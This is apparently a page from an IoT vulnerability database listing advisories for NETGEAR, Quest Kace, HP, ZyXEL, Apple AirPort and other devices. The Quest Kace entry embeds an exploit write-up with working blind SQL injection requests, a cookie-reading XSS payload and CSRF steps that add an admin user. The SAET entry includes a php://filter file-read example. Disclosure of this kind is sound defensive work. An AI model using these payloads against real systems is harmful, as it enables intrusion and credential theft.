VARIoT IoT vulnerabilities database

NETGEAR Insight Cloud with firmware before Insight 5.6 allows remote authenticated users to achieve command injection. NETGEAR Insight is a cloud-based management platform from NETGEAR. The platform supports setup and configuration of NETGEAR Insight managed access points, switches and ReadyNAS devices, among others. This vulnerability stems from the fact that the network system or product does not correctly filter special elements in the process of constructing executable commands from external input data. Attackers can exploit this vulnerability to execute illegal commands

Yonghong Electric Co., Ltd. is a company founded by a group of engineers engaged in PLC design and development. There is a stack overflow vulnerability in the FATEK WinProladder pdw project file, which can be used by an attacker to execute malicious code

The Quest Kace K1000 Appliance, versions prior to 9.0.270, allows an authenticated least privileged user with 'User Console Only' rights to potentially inject arbitrary JavaScript code on the tickets page. Script execution could allow a malicious user of the system to steal session cookies of other users including Administrator and take over their session. This can further be exploited to launch other attacks. The software also does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. The software does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other user. An authenticated user with 'user console only' rights may inject arbitrary JavaScript, which could result in an attacker taking over a session of others, including an Administrator. The Quest Kace System Management (K1000) Appliance contains multiple vulnerabilities, including a blind SQL injection vulnerability and a stored cross site scripting vulnerability. It also suffers from misconfigurations in the cross-origin resource sharing (CORS) mechanism and improperly validates source communications. Quest Kace K1000 Appliance Contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. QuestSoftwareKaceK1000Appliance is a system management device from QuestSoftware, USA. This product is mainly used for software license management, patch and endpoint security management, software distribution and server monitoring. A cross-site scripting vulnerability exists in versions prior to QuestKaceK1000Appliance 9.0.270 that could allow an attacker to execute client-side code. # Exploit Title: [Dell Kace Appliance Multiple Vulnerabilities] # Date: [12/04/2018] # Exploit Author: [SlidingWindow], Twitter: @kapil_khot # Vendor Homepage: [https://www.quest.com/products/kace-systems-management-appliance/] # Affected Versions: [KACE SMA versions prior to 9.0.270 PATCH SEC2018_20180410] # Tested on: [Quest Kace K1000 Appliance versions, 8.0.318, 8.0.320 and 9.0.270 ] # CVE : [CVE-2018-5404,CVE-2018-5405,CVE-2018-5406] #CERT Advisory: [https://www.kb.cert.org/vuls/id/877837/] #Vendor Advisory: https://support.quest.com/kb/288310/cert-coordination-center-report-update ================== #Product:- ================== Quest KACE, formerly Dell KACE, is a company that specializes in computer appliances for systems management of information technology equipment. ======================== #Vulnerability Details:- ======================== ===================================================================================================================================================== 1. Blind SQL Injection Vulnerability in Ajax_Lookup_List.PHP (CVE-2018-5404) ===================================================================================================================================================== The Dell Kace allows Admin users to access ajax_lookup_list.php. However, it can be accessed by a least privileged user with ‘User Console Only’ rights. Also, the user input supplied to 'selvalue' parameter is not sanitized that leads to a Blind SQL Injection vulnerability. #Proof-Of-Concept: ------------------ 1. Send following request to the target: GET /common/ajax_lookup_list.php?query_type=submitter&parent_mapping=false&place_holder=Unassigned&suppress_place_holder_as_choice=false&selected=13&selvalue=13&queue_id=1&limit=10&org_id=1&locale=en_US&id=13 HTTP/1.1 Host: 192.168.247.100 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Referer: http://192.168.247.100/userui/ticket.php?QUEUE_ID=1 Cookie: kbox_nav=1; KACE_LAST_USER=%98%B59%CB%D9%27f+%28%B6%83b%0F8a%EF; KACE_LAST_ORG=%DE%A3%0E20%8E%84%BF%B1%D5%89%E0%A8%E6%2A%FD; kboxid=i0b4qhnv66qg41893hb1q5g146; KACE_CSRF_TOKEN=4862fbb6808731e6658aeca4ea48bd2cac08502ca289e1d3305875b165fb2c86d5441145152ada3f3c701cf2387db6086e7c349c5265ec3b2110978a70ebde6f; KONEA=ebWI%2BP%2FFEgmTioFCZ3xVTgsN174jAtY0mkDdAov5uZtJEpn2FziBYMEinZsmN63zlNfEooUtIXJDgiJgmSKfFk3VvQguPiEAYQIaYpMhcFRQkfyANLWQy2tJzS8mByjYxJZlBRcYhJYlVqAMppyuikdVPOQRynpbiRNSIqVlX0wyxIBFaoF4b8O09p4wYkritpr1qM%2BMoLmA2n3%2BQCY2u%2FvD8DdrIVtm8t2%2BNxMVCCZjfpqpjKef73l7xx2yBxlV9kRG04gPNHXFfv8f4TZB82%2FvurTFqgOWThxp51YjdpWfssEJQsss1O1B3FtYEH0h83Wrl9ABzsRx%2FZafVGjQTw%3D%3D; x-dell-auth-jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJpc3MiOiJBTVNJZGVudGl0eVByb3ZpZGVyIiwic3ViIjozLCJhdWQiOiJFU01QbGF0Zm9ybSIsImNvbiI6IjRkMzkwY2M2ODMzZTRkMjk4MTI0NzYyYmQwYjdiNzRjIiwiZXhwIjoxNTIxMzA3NTExfQ.S9h0USN7xS0VmeapB6zWqKnAW-e-vd9J9-NrH9383gSXX6K_vEgXSv0FpuPGCtYQ2I3o7gxuYBKxy_qCqp1xd2w2NRowiZb5_WlwoHBWeTnaP3D9Y6Ek4nd9CKgPaZF1Y8TtaZkdbbWWFTdjtpkD3CK5eNHX_lsqtPD_gVJWwxc Connection: close 2. Make a note of Content-Length in the response body. 3. Send following request: http://192.168.247.100/common/ajax_lookup_list.php?query_type=submitter&parent_mapping=false&place_holder=Unassigned&suppress_place_holder_as_choice=false&selected=13&selvalue=13'&queue_id=1&limit=10&org_id=1&locale=en_US&id=13 4. Response to above request shows that an error occurred and we are being redirected to /common/error.php 5. Final payload to check if we get the original response back: http://192.168.247.100/common/ajax_lookup_list.php?query_type=submitter&parent_mapping=false&place_holder=Unassigned&suppress_place_holder_as_choice=false&selected=13&selvalue=13''&queue_id=1&limit=10&org_id=1&locale=en_US&id=13 6. These tests confirm that the 'selvalue' parameter is indeed vulnerable to Blind SQL Injection. This can further be exploited by modifying the payload or using SQLMap to retrieve some sensitive information from the database. ========================================================================================================================================================= 2. Blind SQL Injection Vulnerability in Oval_Detail.PHP (CVE-2018-5404) ========================================================================================================================================================= The Dell Kace allows Admin users to view OVAL templates via 'oval_detail.php', that can be accessed by a user with ‘Read Only Administrator’ rights. Also, the user input supplied to ID parameter is not sanitized that leads to a Blind SQL Injection vulnerability. An authenticated user with ‘Read Only Administrator’ rights could exploit this vulnerability to retrieve sensitive information from the database. #Proof-Of-Concept: ------------------ 1. Send following request to the target: GET /adminui/oval_detail.php?ID=6200 HTTP/1.1 Host: 192.168.247.100 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://192.168.247.100/adminui/oval_list.php Cookie: kbox_nav=1; KACE_LAST_USER=%9A%95%91%5E%AF%B2%A6%FA%02M%B5%7D%08%87%D52; KACE_LAST_ORG=%DE%A3%0E20%8E%84%BF%B1%D5%89%E0%A8%E6%2A%FD; kboxid=i48m8gm8kcnbiptc28pq8u7uq1; KACE_CSRF_TOKEN=96acbdac36b0143958a7d96ba318eb5c626884d46733a8ed05c88cfe94d80cfdebe6bd9790ff4fec3a79fa988ff828dac4d841356c72eebb015d20c5ffd5a01a; KONEA=xvqV3k6fWuhsnypD45pPw4OPs7fZxUDP24mubodoYiSj8Y8EqJpUnakrq%2BHEefSs0YkzglNboWvUhE%2FuavTZZrkyNPMF1IH2QB%2FIF7jSm6fLukuuMyLgTFZWtOg16t5eJqCXvn0f54tfwFnfB1tobY%2Fu6MDe8BOWKaj6mByvdD6kNREg%2B%2FLwAcfIYmgJNKYu0Wd9JwsRpWpuRyZkejbrZB%2FSlkh80oHvHSey0inQmIy7B4bYnPCPUfTU8qPeZLaPcvYFchruj%2BabBazlHAaq44txeUy2AtG85ntiN8XPXoZnflHOD%2B5WjTywTtRGiRpCQVQNDbHTOdSUuljpDEyjrw%3D%3D; x-dell-auth-jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJpc3MiOiJBTVNJZGVudGl0eVByb3ZpZGVyIiwic3ViIjo0LCJhdWQiOiJFU01QbGF0Zm9ybSIsImNvbiI6ImVlMTk3ZGE5NmFmYTRiYzViYzk5Y2VhMzI3ZjQ2OTdiIiwiZXhwIjoxNTIxMjk3MzE5fQ.GHuAWu_mcviKl0HQcFjY0In5aJxgB-WZCaHP5XQMdpdboby0b1qnwh4DyC3TQg4PktBm_D0Vu4LOMY5KWGRvwOQCTwrzBFLg3ogsKWb0AMO3RArrENXxEO3P3K6XFQCEIlpU9n9K1APnnRSTsfPEL7GC5GkzixakXAlZMZzLB_0 Connection: close Upgrade-Insecure-Requests: 1 2. Response to above request shows some content with the content length of 32109 bytes: 3. It shows information about OVAL-ID#24253: 4. Now send following payload that tests this ID parameter for a true condition: http://192.168.247.100/adminui/oval_detail.php?ID=6200+AND+6432=6432 5. Response to above request again shows information about the same OVAL-ID#24252: 6. Now, use following payload to test this ID parameter for a false condition: http://192.168.247.100/adminui/oval_detail.php?ID=6200+AND+6432=6444 7. The response to false condition is different than the response to normal and/or true condition. This response does not show any information about any OVAL-ID: 8. These tests confirm that the ID parameter is indeed vulnerable to Blind SQL Injection. This can further be exploited by modifying the payload or using SQLMap to retrieve some sensitive information from the database. ========================================================================================================================================================= 3. This script executes every time a user visits this page. #Proof-Of-Concept: ------------------ 1. Log into the Dell Kace K1000 web interface as a least privileged user. 2. Navigate to Service Desk-->Tickets and create a new ticket. 3. Inject following payload in the Summary section: Test Ticket</textarea></div></div><script>alert("XSSinSummary");alert(document.cookie);</script><!-- 4. Save the ticket. 5. Go back to tickets and view this newly created ticket and a couple of alert boxes should pop up. 6. ========================================================================================================================================================= 4. Misconfigured CORS Vulnerability (CVE-2018-5406) ========================================================================================================================================================= The Dell Kace K1000 fails to implement Cross Origin Resource Sharing (CORS) properly, that leads to a Cross Site Request Forgery (CSRF) attack. An unauthenticated, remote attacker could exploit this vulnerability to perform sensitive actions such as adding a new administrator account or changing appliance’s settings. Also, malicious internal user of the organization could induce an administrator of this appliance to visit a malicious link that exploits this vulnerability to perform sensitive actions such as adding a new administrator account or changing appliance’s settings. #Proof-Of-Concept: ------------------ 1. Try to create a new user and capture the request in BurpSuite to create a CSRF PoC from there. Create an HTML form and put it under Web Root of your Kali machine. 2. Log into the web interface of the appliance as admin. 3. Open a new tab in the same browser and access the HTML page from #1 4. Save the ticket. 5. Submit the request (This can be modified to submit the request automatically). 6. Check BurpSuite to see if the request to add user ‘Hacker’ was sent to the appliance and if it was originated from your Kali machine 7. Check the admin console to see if user Hacker has been added: =================================== #Vulnerability Disclosure Timeline: =================================== 04/2018: Submitted report to CERT-US. 04/2018: CERT-US reported the issue to vendor. 05/2018: Awaiting vendor response. 10/2018: Vendor asked to test the patch as they have fixed these issues already. 10/2018: Confirmed that all the vulnerabilities except Vulnerability#2 is fixed in 9.0.270 and still exists in other patched version. 01/2019: Vendor confirmed that they are working on fixing all of the vulnerabilities and would release a patch on May 01 2019 and asked to publish this on June 01 2019 so that customers have enough time to patch. 05/2019: Vendor published an advisory. 06/2019: CERT-US published a Vulnerability Note, VU#877837

The Quest Kace K1000 Appliance, versions prior to 9.0.270, allows an authenticated, remote attacker with least privileges ('User Console Only' role) to potentially exploit multiple Blind SQL Injection vulnerabilities to retrieve sensitive information from the database or copy the entire database. An authenticated remote attacker could leverage Blind SQL injections to obtain sensitive data. The Quest Kace System Management (K1000) Appliance contains multiple vulnerabilities, including a blind SQL injection vulnerability and a stored cross site scripting vulnerability. It also suffers from misconfigurations in the cross-origin resource sharing (CORS) mechanism and improperly validates source communications. QuestSoftwareKaceK1000Appliance is a system management device from QuestSoftware, USA. This product is mainly used for software license management, patch and endpoint security management, software distribution and server monitoring

HP Color LaserJet Pro M280-M281 Multifunction Printer series (before v. 20190419), HP LaserJet Pro MFP M28-M31 Printer series (before v. 20190426) may have embedded web server attributes which may be potentially vulnerable to Buffer Overflow. HPColorLaserJetProM280-M281MultifunctionPrinterseries and HPLaserJetProMFPM28-M31Printerseries are HP (HP) printer products. A buffer overflow vulnerability exists in versions prior to HPColorLaserJetProM280-M281MultifunctionPrinterseries20190419 and prior versions of HPLaserJetProMFPM28-M31Printerseries20190426. The vulnerability stems from a network system or product that does not properly validate data boundaries when performing operations on memory, causing erroneous read and write operations to be performed on other associated memory locations. An attacker could exploit the vulnerability to cause a buffer overflow or heap overflow. A cross-site scripting vulnerability 2. A cross-site request forgery vulnerability 3. An HTML-injection vulnerability 4. Multiple buffer-overflow vulnerabilities An attacker may leverage these issues to execute arbitrary script code in the browser of the victim in the context of the affected site, steal cookie-based authentication credentials, execute arbitrary code within the context o f the affected device

HP Color LaserJet Pro M280-M281 Multifunction Printer series (before v. 20190419), HP LaserJet Pro MFP M28-M31 Printer series (before v. 20190426) may have an embedded web server that is potentially vulnerable to Cross-site Request Forgery. HP Color LaserJet Pro M280-M281 and MFP M28-M31 Multifunction Printer The series contains a cross-site request forgery vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. HPColorLaserJetProM280-M281MultifunctionPrinterseries and HPLaserJetProMFPM28-M31Printerseries are HP (HP) printer products. The vulnerability stems from the fact that the web application did not fully verify that the request came from a trusted user. An attacker could exploit the vulnerability to send an unexpected request to the server through an affected client. A cross-site scripting vulnerability 2. An HTML-injection vulnerability 4. Multiple buffer-overflow vulnerabilities An attacker may leverage these issues to execute arbitrary script code in the browser of the victim in the context of the affected site, steal cookie-based authentication credentials, execute arbitrary code within the context o f the affected device

HP Color LaserJet Pro M280-M281 Multifunction Printer series (before v. 20190419), HP LaserJet Pro MFP M28-M31 Printer series (before v. 20190426) may have an embedded web server potentially vulnerable to stored XSS in wireless configuration page. HPColorLaserJetProM280-M281MultifunctionPrinterseries and HPLaserJetProMFPM28-M31Printerseries are HP (HP) printer products. A cross-site scripting vulnerability exists in the wireless configuration page in versions prior to HPColorLaserJetProM280-M281MultifunctionPrinterseries20190419 and earlier versions of HPLaserJetProMFPM28-M31Printerseries20190426. The vulnerability stems from the lack of proper validation of client data for web applications. An attacker could exploit the vulnerability to execute client code. A cross-site scripting vulnerability 2. A cross-site request forgery vulnerability 3. An HTML-injection vulnerability 4. Multiple buffer-overflow vulnerabilities An attacker may leverage these issues to execute arbitrary script code in the browser of the victim in the context of the affected site, steal cookie-based authentication credentials, execute arbitrary code within the context o f the affected device

HP Color LaserJet Pro M280-M281 Multifunction Printer series (before v. 20190419), HP LaserJet Pro MFP M28-M31 Printer series (before v. 20190426) may have an embedded web server potentially vulnerable to reflected XSS in wireless configuration page. HPColorLaserJetProM280-M281MultifunctionPrinterseries and HPLaserJetProMFPM28-M31Printerseries are HP (HP) printer products. A cross-site scripting vulnerability exists in the wireless configuration page in versions prior to HPColorLaserJetProM280-M281MultifunctionPrinterseries20190419 and earlier versions of HPLaserJetProMFPM28-M31Printerseries20190426. The vulnerability stems from the lack of proper validation of client data for web applications. An attacker could exploit the vulnerability to execute client code. A cross-site scripting vulnerability 2. A cross-site request forgery vulnerability 3. An HTML-injection vulnerability 4. Multiple buffer-overflow vulnerabilities An attacker may leverage these issues to execute arbitrary script code in the browser of the victim in the context of the affected site, steal cookie-based authentication credentials, execute arbitrary code within the context o f the affected device

HP Color LaserJet Pro M280-M281 Multifunction Printer series (before v. 20190419), HP LaserJet Pro MFP M28-M31 Printer series (before v. 20190426) may have an IPP Parser potentially vulnerable to Buffer Overflow. HPColorLaserJetProM280-M281MultifunctionPrinterseries and HPLaserJetProMFPM28-M31Printerseries are HP (HP) printer products. A buffer overflow vulnerability exists in versions prior to HPColorLaserJetProM280-M281MultifunctionPrinterseries20190419 and prior versions of HPLaserJetProMFPM28-M31Printerseries20190426. The vulnerability stems from a network system or product that does not properly validate data boundaries when performing operations on memory, causing erroneous read and write operations to be performed on other associated memory locations. An attacker could exploit the vulnerability to cause a buffer overflow or heap overflow. A cross-site scripting vulnerability 2. A cross-site request forgery vulnerability 3. An HTML-injection vulnerability 4. Multiple buffer-overflow vulnerabilities An attacker may leverage these issues to execute arbitrary script code in the browser of the victim in the context of the affected site, steal cookie-based authentication credentials, execute arbitrary code within the context o f the affected device

The WebApp v04.68 in the supervisor on SAET Impianti Speciali TEBE Small 05.01 build 1137 devices allows remote attackers to make several types of API calls without authentication, as demonstrated by retrieving password hashes via an inc/utils/REST_API.php?command=CallAPI&customurl=alladminusers call. SAET Impianti Speciali TEBE Small Device and WebApp Contains an information disclosure vulnerability.Information may be obtained. WebApp is one of the web-based management programs. Attackers can exploit this vulnerability to make various API calls without authentication

There is a lack of CSRF countermeasures on MOBOTIX S14 MX-V4.2.1.61 cameras, as demonstrated by adding an admin account via the /admin/access URI. MOBOTIX S14 The camera contains a cross-site request forgery vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. MOBOTIX S14 is a network camera produced by German MOBOTIX company. There is a cross-site request forgery vulnerability in MOBOTIX S14 MX-V4.2.1.61. The vulnerability stems from the WEB application not adequately verifying that the request is from a trusted user. An attacker could exploit this vulnerability to send unexpected requests to the server through an affected client

The WebApp v04.68 in the supervisor on SAET Impianti Speciali TEBE Small 05.01 build 1137 devices allows remote attackers to execute or include local .php files, as demonstrated by menu=php://filter/convert.base64-encode/resource=index.php to read index.php. SAET Impianti Speciali TEBE Small Device and WebApp Contains a path traversal vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. SAET Impianti Speciali TEBE Small is a set of physical access control system of Italy SAET company. WebApp is one of the web-based management programs. A security vulnerability exists in WebApp v04.68 in SAET Impianti Speciali TEBE Small 05.01 build 1137

The rpWLANRedirect.asp ASP page is accessible without authentication on ZyXEL P-660HN-T1 V2 (2.00(AAKK.3)) devices. After accessing the page, the admin user's password can be obtained by viewing the HTML source code, and the interface of the modem can be accessed as admin. ZyXEL P-660HN-T1 V2 Contains a vulnerability in the use of hard-coded credentials.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. ZyXEL P-660HN-T1 is a modem manufactured by ZyXEL, Taiwan, China

NUUO Network Video Recorder Firmware 1.7.x through 3.3.x allows unauthenticated attackers to execute arbitrary commands via shell metacharacters to handle_load_config.php. NUUO Network Video Recorder Firmware Contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. NUUONetworkVideoRecorder (NVR) is a network video recorder from NUUO Corporation of Taiwan, China. There is a security hole in NUUONVR using firmware version 1.7.x to 3.3.x

Jector Smart TV FM-K75 devices allow remote code execution because there is an adb open port with root permission. Jector Smart TV FM-K75 Devices have vulnerabilities related to authorization, permissions, and access control.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Jector Smart TV FM-K75 is a smart TV. A security vulnerability exists in the Jector Smart TV FM-K75. A remote attacker could exploit this vulnerability to execute code

The Xiaomi M365 scooter 2019-02-12 before 1.5.1 allows spoofing of "suddenly accelerate" commands. This occurs because Bluetooth Low Energy commands have no server-side authentication check. Other affected commands include suddenly braking, locking, and unlocking. Xiaomi M365 Scooter is vulnerable to authorization.Information may be tampered with

An out-of-bounds read was addressed with improved input validation. This issue is fixed in AirPort Base Station Firmware Update 7.8.1, AirPort Base Station Firmware Update 7.9.1. A remote attacker may be able to leak memory. AppleAirPortBaseStation is a wireless router from Apple Inc. of the United States. A buffer overflow vulnerability exists in AppleAirPortBaseStation using firmware prior to 7.9.1. The vulnerability stems from a network system or product that does not properly validate data boundaries when performing operations on memory, causing erroneous read and write operations to be performed on other associated memory locations. An attacker could exploit the vulnerability to cause a buffer overflow or heap overflow. Attackers can exploit these issues to execute arbitrary code, bypass security restrictions, gain sensitive information and cause denial-of-service conditions. Apple AirPort Base Station could allow a remote malicious user to obtain sensitive information, caused by an out-of-bounds read error. CVE-2019-8581: Lucio Albornoz AirPort Base Station Firmware Available for: AirPort Extreme and AirPort Time Capsule base stations with 802.11ac Impact: A remote attacker may be able to cause a system denial of service Description: A null pointer dereference was addressed with improved input validation. CVE-2019-8588: Vince Cali (@0x56) AirPort Base Station Firmware Available for: AirPort Extreme and AirPort Time Capsule base stations with 802.11ac Impact: A remote attacker may be able to cause a system denial of service Description: A denial of service issue was addressed with improved validation. CVE-2018-6918: Maxime Villard AirPort Base Station Firmware Available for: AirPort Extreme and AirPort Time Capsule base stations with 802.11ac Impact: A remote attacker may be able to cause arbitrary code execution Description: A use after free issue was addressed with improved memory management. CVE-2019-8575: joshua stein AirPort Base Station Firmware Available for: AirPort Extreme and AirPort Time Capsule base stations with 802.11ac Impact: An attacker in a privileged position may be able to perform a denial of service attack Description: A denial of service issue was addressed with improved memory handling. CVE-2019-7291: Maxime Villard AirPort Base Station Firmware Available for: AirPort Extreme and AirPort Time Capsule base stations with 802.11ac Impact: Source-routed IPv4 packets may be unexpectedly accepted Description: Source-routed IPv4 packets were disabled by default. CVE-2019-8580: Maxime Villard AirPort Base Station Firmware Available for: AirPort Extreme and AirPort Time Capsule base stations with 802.11ac Impact: A remote attacker may be able to cause arbitrary code execution Description: A null pointer dereference was addressed with improved input validation. CVE-2019-8572: Maxime Villard Installation note: Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- iQIzBAEBCAAdFiEEDNXJVNCJJEAVmJdZeC9tht7TK3EFAlzwO9kACgkQeC9tht7T K3E14A/+LIUEHIyDAewGNwmeNdmIEg25JJQbn2GheSuEo3toK8OTxxo0JEqIp8wO gDEWxC4WUgLUUliu4QpBl0R3Jy573EF5WEzDF0vl9vP6/AP0X5LT0kkuK7GSpRTA 7N+zvRCRjLYtBsqhRxqDwpDfrCgmjjPTPbjpx/Mk94mpWcLIbmfp8a9JUVXWpm17 60hhkWIc4NP15uZZ1GAt2IiWE8ZnvQ3SiWtj/bbbdw9IX5KRbfyRs/rWOwqqIXpb 1SKZClEfTECZtbCyvg9jFK3hKKUbW/A7rfkCqQGkYPU1O4L5eBQY+o+V9Hkwg6V9 WdqUOLF+bA1NlwqXinBypf0wmLfMImRHEID0w0660T+2+l6sOrJOEZDuMy47ltYi newJ92HL79uvKvz3gkpRS84hrZlcmp7JAS8+c+BV2SriY3J5V8hIAVmjbkxAUOM8 wRv2FJXbvibo5eI+ceYOXZ/gMtsH5trlbskKHCoiYnhqxu4vXnNK4UKik7xn+QtB Q1UxDAA8VmlK9hw/PNrA9RuBsrkxBGj5Hwr0WpiZrmFsDoCiSdjMb3NltSmKL+nd 0TthDSbr7iHTPtkREORvf+4FjGXfwUnOa6/xjAI6JN/RLcjNdqMli6TBUlVMGa2C ZVmolUQCqoB82IwmFt2ZhuQIa2liLv5zOeJuXuZcGQ7GpoEynV8= =VaIH -----END PGP SIGNATURE-----

A use after free issue was addressed with improved memory management. This issue is fixed in AirPort Base Station Firmware Update 7.8.1, AirPort Base Station Firmware Update 7.9.1. A remote attacker may be able to cause arbitrary code execution. A resource management error vulnerability exists in Apple AirPort Base Stations using firmware versions prior to 7.9.1. The vulnerability stems from improper management of system resources (such as memory, disk space, files, etc.) by network systems or products. No detailed vulnerability details are currently provided. Attackers can exploit these issues to execute arbitrary code, bypass security restrictions, gain sensitive information and cause denial-of-service conditions. CVE-2019-8581: Lucio Albornoz AirPort Base Station Firmware Available for: AirPort Extreme and AirPort Time Capsule base stations with 802.11ac Impact: A remote attacker may be able to cause a system denial of service Description: A null pointer dereference was addressed with improved input validation. CVE-2019-8588: Vince Cali (@0x56) AirPort Base Station Firmware Available for: AirPort Extreme and AirPort Time Capsule base stations with 802.11ac Impact: A remote attacker may be able to cause a system denial of service Description: A denial of service issue was addressed with improved validation. CVE-2018-6918: Maxime Villard AirPort Base Station Firmware Available for: AirPort Extreme and AirPort Time Capsule base stations with 802.11ac Impact: A remote attacker may be able to cause arbitrary code execution Description: A use after free issue was addressed with improved memory management. CVE-2019-8575: joshua stein AirPort Base Station Firmware Available for: AirPort Extreme and AirPort Time Capsule base stations with 802.11ac Impact: An attacker in a privileged position may be able to perform a denial of service attack Description: A denial of service issue was addressed with improved memory handling. CVE-2019-7291: Maxime Villard AirPort Base Station Firmware Available for: AirPort Extreme and AirPort Time Capsule base stations with 802.11ac Impact: Source-routed IPv4 packets may be unexpectedly accepted Description: Source-routed IPv4 packets were disabled by default. CVE-2019-8580: Maxime Villard AirPort Base Station Firmware Available for: AirPort Extreme and AirPort Time Capsule base stations with 802.11ac Impact: A remote attacker may be able to cause arbitrary code execution Description: A null pointer dereference was addressed with improved input validation. CVE-2019-8572: Maxime Villard Installation note: Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- iQIzBAEBCAAdFiEEDNXJVNCJJEAVmJdZeC9tht7TK3EFAlzwO9kACgkQeC9tht7T K3E14A/+LIUEHIyDAewGNwmeNdmIEg25JJQbn2GheSuEo3toK8OTxxo0JEqIp8wO gDEWxC4WUgLUUliu4QpBl0R3Jy573EF5WEzDF0vl9vP6/AP0X5LT0kkuK7GSpRTA 7N+zvRCRjLYtBsqhRxqDwpDfrCgmjjPTPbjpx/Mk94mpWcLIbmfp8a9JUVXWpm17 60hhkWIc4NP15uZZ1GAt2IiWE8ZnvQ3SiWtj/bbbdw9IX5KRbfyRs/rWOwqqIXpb 1SKZClEfTECZtbCyvg9jFK3hKKUbW/A7rfkCqQGkYPU1O4L5eBQY+o+V9Hkwg6V9 WdqUOLF+bA1NlwqXinBypf0wmLfMImRHEID0w0660T+2+l6sOrJOEZDuMy47ltYi newJ92HL79uvKvz3gkpRS84hrZlcmp7JAS8+c+BV2SriY3J5V8hIAVmjbkxAUOM8 wRv2FJXbvibo5eI+ceYOXZ/gMtsH5trlbskKHCoiYnhqxu4vXnNK4UKik7xn+QtB Q1UxDAA8VmlK9hw/PNrA9RuBsrkxBGj5Hwr0WpiZrmFsDoCiSdjMb3NltSmKL+nd 0TthDSbr7iHTPtkREORvf+4FjGXfwUnOa6/xjAI6JN/RLcjNdqMli6TBUlVMGa2C ZVmolUQCqoB82IwmFt2ZhuQIa2liLv5zOeJuXuZcGQ7GpoEynV8= =VaIH -----END PGP SIGNATURE-----

The issue was addressed with improved data deletion. This issue is fixed in AirPort Base Station Firmware Update 7.8.1, AirPort Base Station Firmware Update 7.9.1. A base station factory reset may not delete all user information. No detailed vulnerability details are currently provided. Attackers can exploit these issues to execute arbitrary code, bypass security restrictions, gain sensitive information and cause denial-of-service conditions. An attacker could exploit this vulnerability to gain access to user information. CVE-2019-8581: Lucio Albornoz AirPort Base Station Firmware Available for: AirPort Extreme and AirPort Time Capsule base stations with 802.11ac Impact: A remote attacker may be able to cause a system denial of service Description: A null pointer dereference was addressed with improved input validation. CVE-2019-8588: Vince Cali (@0x56) AirPort Base Station Firmware Available for: AirPort Extreme and AirPort Time Capsule base stations with 802.11ac Impact: A remote attacker may be able to cause a system denial of service Description: A denial of service issue was addressed with improved validation. CVE-2018-6918: Maxime Villard AirPort Base Station Firmware Available for: AirPort Extreme and AirPort Time Capsule base stations with 802.11ac Impact: A remote attacker may be able to cause arbitrary code execution Description: A use after free issue was addressed with improved memory management. CVE-2019-8575: joshua stein AirPort Base Station Firmware Available for: AirPort Extreme and AirPort Time Capsule base stations with 802.11ac Impact: An attacker in a privileged position may be able to perform a denial of service attack Description: A denial of service issue was addressed with improved memory handling. CVE-2019-7291: Maxime Villard AirPort Base Station Firmware Available for: AirPort Extreme and AirPort Time Capsule base stations with 802.11ac Impact: Source-routed IPv4 packets may be unexpectedly accepted Description: Source-routed IPv4 packets were disabled by default. CVE-2019-8580: Maxime Villard AirPort Base Station Firmware Available for: AirPort Extreme and AirPort Time Capsule base stations with 802.11ac Impact: A remote attacker may be able to cause arbitrary code execution Description: A null pointer dereference was addressed with improved input validation. CVE-2019-8572: Maxime Villard Installation note: Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- iQIzBAEBCAAdFiEEDNXJVNCJJEAVmJdZeC9tht7TK3EFAlzwO9kACgkQeC9tht7T K3E14A/+LIUEHIyDAewGNwmeNdmIEg25JJQbn2GheSuEo3toK8OTxxo0JEqIp8wO gDEWxC4WUgLUUliu4QpBl0R3Jy573EF5WEzDF0vl9vP6/AP0X5LT0kkuK7GSpRTA 7N+zvRCRjLYtBsqhRxqDwpDfrCgmjjPTPbjpx/Mk94mpWcLIbmfp8a9JUVXWpm17 60hhkWIc4NP15uZZ1GAt2IiWE8ZnvQ3SiWtj/bbbdw9IX5KRbfyRs/rWOwqqIXpb 1SKZClEfTECZtbCyvg9jFK3hKKUbW/A7rfkCqQGkYPU1O4L5eBQY+o+V9Hkwg6V9 WdqUOLF+bA1NlwqXinBypf0wmLfMImRHEID0w0660T+2+l6sOrJOEZDuMy47ltYi newJ92HL79uvKvz3gkpRS84hrZlcmp7JAS8+c+BV2SriY3J5V8hIAVmjbkxAUOM8 wRv2FJXbvibo5eI+ceYOXZ/gMtsH5trlbskKHCoiYnhqxu4vXnNK4UKik7xn+QtB Q1UxDAA8VmlK9hw/PNrA9RuBsrkxBGj5Hwr0WpiZrmFsDoCiSdjMb3NltSmKL+nd 0TthDSbr7iHTPtkREORvf+4FjGXfwUnOa6/xjAI6JN/RLcjNdqMli6TBUlVMGa2C 